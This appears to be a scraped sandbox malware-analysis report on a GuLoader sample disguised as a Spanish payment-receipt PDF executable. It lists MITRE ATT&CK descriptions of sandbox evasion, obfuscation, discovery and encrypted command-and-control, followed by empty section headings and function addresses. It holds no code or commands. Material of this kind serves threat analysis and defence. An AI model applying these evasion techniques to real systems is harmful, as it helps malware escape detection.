Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Justificante de Pago 25112021.pdf _.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: Justificante de Pago 25112021.pdf _.exe PID: 6016 Parent PID: 5364

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: Justificante de Pago 25112021.pdf _.exe PID: 6016 Parent PID: 5364 Justificante de Pago 25112021.pdf _.exeCOMMON

Executed Functions

Function 0298C889, Relevance: 9.8, APIs: 1, Strings: 4, Instructions: 1071memorynativeCOMMON

Function 00401578, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 943
COMMONCrypto

Function 0041CF24, Relevance: 323.2, APIs: 172, Strings: 12, Instructions: 1159
COMMON

Function 0041F309, Relevance: 82.6, APIs: 42, Strings: 5, Instructions: 368
COMMON

Function 0041E120, Relevance: 63.3, APIs: 34, Strings: 2, Instructions: 274
COMMON

Function 0041F0C7, Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 163
COMMON

Function 0041EE62, Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 159
COMMON

Function 0041E638, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 166
COMMON

Function 0041E870, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 155
COMMON

Function 0041DF1B, Relevance: 33.2, APIs: 22, Instructions: 157
COMMON

Function 0041EC74, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 142
COMMON

Function 0041EB73, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 70
COMMON

Function 0041E48F, Relevance: 21.1, APIs: 14, Instructions: 127
COMMON